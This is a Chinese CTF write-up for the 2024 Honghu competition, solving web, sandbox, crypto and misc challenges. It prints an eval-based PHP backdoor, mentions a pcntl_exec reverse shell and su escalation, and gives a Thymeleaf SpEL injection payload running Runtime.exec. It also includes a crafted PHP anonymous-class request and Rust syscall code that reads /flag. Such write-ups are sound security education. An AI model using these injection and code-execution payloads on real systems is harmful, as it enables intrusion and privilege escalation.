2024第四届红明谷 WriteUp By Mini-Venom
招新小广告CTF组诚招re、crypto、pwn、misc、合约方向的师傅,长期招新IOT+Car+工控+样本分析多个组招人有意向的师傅请联系邮箱
admin@chamd5.org(带上简历和想加入的小组
Web
unauth
<?phpif (!isset($_SERVER['PHP_AUTH_USER'])) { header('WWW-Authenticate: Basic realm="Restricted Area"'); header('HTTP/1.0 401 Unauthorized'); echo '小明是运维工程师,最近网站老是出现bug。'; exit;} else { $validUser = 'admin'; $validPass = '2e525e29e465f45d8d7c56319fe73036'; if ($_SERVER['PHP_AUTH_USER'] != $validUser || $_SERVER['PHP_AUTH_PW'] != $validPass) { header('WWW-Authenticate: Basic realm="Restricted Area"'); header('HTTP/1.0 401 Unauthorized'); echo 'Invalid credentials'; exit; }}@eval($_GET['cmd']);highlight_file(__FILE__);?>
根目录flag,需要提权
Array ( [0] => . [1] => .. [2] => config.inc.php [3] => index.php [4] => www.zip )
<!--?php# If you are having problems connecting to the MySQL database and all of the variables below are correct# try changing the 'db_server' variable from localhost to 127.0.0.1. Fixes a problem due to sockets.# Thanks to @digininja for the fix.# Database management system to use$DBMS = 'MySQL';#$DBMS = 'PGSQL'; // Currently disabled# Database variables# WARNING: The database specified under db_database WILL BE ENTIRELY DELETED during setup.# Please use a database dedicated to DVWA.## If you are using MariaDB then you cannot use root, you must use create a dedicated DVWA user.# See README.md for more information on this.$_DVWA = array();$_DVWA[ 'db_server' ] = '127.0.0.1';$_DVWA[ 'db_database' ] = 'dvwa';$_DVWA[ 'db_user' ] = 'root';$_DVWA[ 'db_password' ] = 'b90e0086d8b1165403de6974c4167165';# Only used with PostgreSQL/PGSQL database selection.$_DVWA[ 'db_port '] = '5432';# ReCAPTCHA settings# Used for the 'Insecure CAPTCHA' module# You'll need to generate your own keys at: https://www.google.com/recaptcha/admin$_DVWA[ 'recaptcha_public_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';# Default security level# Default value for the secuirty level with each session.# The default is 'impossible'. You may wish to set this to either 'low', 'medium', 'high' or impossible'.$_DVWA[ 'default_security_level' ] = 'impossible';# Default PHPIDS status# PHPIDS status with each session.# The default is 'disabled'. You can set this to be either 'enabled' or 'disabled'.$_DVWA[ 'default_phpids_level' ] = 'disabled';# Verbose PHPIDS messages# Enabling this will show why the WAF blocked the request on the blocked request.# The default is 'disabled'. You can set this to be either 'true' or 'false'.$_DVWA[ 'default_phpids_verbose' ] = 'false';?-->
pcntl_exec反弹shell,su用读到的密码提权即可
easyescape-赛后复现
设置了ttl=0,并且解析到实际发起请求有4s的间隔。
还以为是DNS rebinding,但实测不行,今天看了看确实是两次请求,存在DNS重绑定攻击的可能,但本地还是远程都打不通。利用302跳转可以绕过。
[图片] 内网就是个Thymeleaf SSTI,又出网,直接弹shell。
Context context = new Context(); SpringTemplateEngine engine = new SpringTemplateEngine(); return engine.process(hostname, (IContext)context);
hostname填这个:
[[${T(java.lang.Boolean).forName("com.fasterxml.jackson.databind.ObjectMapper").newInstance().readValue("{}",T(java.lang.Boolean).forName("org.springframework.expression.spel.standard.SpelExpressionParser")).parseExpression("T(Runtime).getRuntime().exec('calc')").getValue()}]]
ezphp
https://github.com/synacktiv/php\_filter\_chains\_oracle\_exploit
Error based oracle测信道攻击
工具有几率跑出来部分内容,如下传参后有个highlight
/flag.php?ezphpPhp8=ko1sh1
<?phpif (isset($_GET['ezphpPhp8'])) { highlight_file(__FILE__);} else { die("No");}$a = new class { function __construct() { } function getflag() { system('cat /flag'); }};unset($a);$a = $_GET['ezphpPhp8'];$f = new $a();$f->getflag();
GET /flag.php?ezphpPhp8=class@anonymous%00/var/www/html/flag.php:7$0 HTTP/1.1Host: eci-2zef6aoe4x8c78fobzdc.cloudeci1.ichunqiu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="107", "Chromium";v="107", "Not=A?Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1711431296,1711937711,1712027510
playground
ban了std的情况下写rust程序去执行
orw获取flag,可以写内联汇编来搞syscall(rust的orw shellcode)
fn main() { let mut buf = [0u8; 1024]; let filename = "/flag\\0"; let fd: i32; let count: usize; unsafe { // open 系统调用 core::arch::asm!( "syscall", in("rax") 2, // sys_open in("rdi") filename.as_ptr(), in("rsi") 0, // flags (O_RDONLY) lateout("rax") fd, ); // 检查文件描述符是否有效 if fd >= 0 { // read 系统调用 core::arch::asm!( "syscall", in("rax") 0, // sys_read in("rdi") fd, in("rsi") buf.as_mut_ptr(), in("rdx") buf.len(), lateout("rax") count, ); // write 系统调用,将读取的内容写到标准输出 core::arch::asm!( "syscall", in("rax") 1, // sys_write in("rdi") 1, // in("rsi") buf.as_ptr(), in("rdx") count, ); } }}
Crypto
CDMA-赛后复现
给出的signal数据存在高斯噪声,先降噪,求平均值即可
然后整个算法可以看作是
但是这个也不是正正好就是模2的矩阵乘法,向量内积的时候元素加元素是异或(模2加),但是最后做加法的时候又是单纯求和 不过 0,1的异或算法,和 1,-1的乘法运算可以一一对应,
因此上面的运算也可以映射成矩阵乘法,(正负好像得反一下)
于是 S 就可以看作是由 chips 线性变换而来,并且 chips 只有 1 和 -1,于是直接对 S 求一个LLL
得到 chips 后
根据 cdma 的转换后的正交特性
于是我们计算
即可得到
这样子flag就由列向量变成行向量了。不过因为这里使用的 1 和 -1,题目的基是 0 和 1,所以结果并不是32的倍数,不过根据实践结果来看,也不复杂,只有两种可能。
with open("output.pkl", "rb") as file: signal = pickle.load(file)single_signal_list = []signals = []signals_col = []for i in range(0,len(signal)//1997): single_signal_list = signal[i*1997:(i+1)*1997] single_signal = round((sum(single_signal_list)/1997)*10) signals.append(single_signal) if len(signals) == 32: signals_col.append(signals) signals = [] signals_matrix = matrix(ZZ,signals_col)chips = signals_matrix.LLL()[-11:-1]M_T = chips * signals_matrix.Tfor m in M_T: tag = m[0] flag=''.join(['0' if i == tag else '1' for i in m]) print(int.to_bytes(int(flag,2),48,'
Misc
定位签到
别用谷歌~用bing
- END -
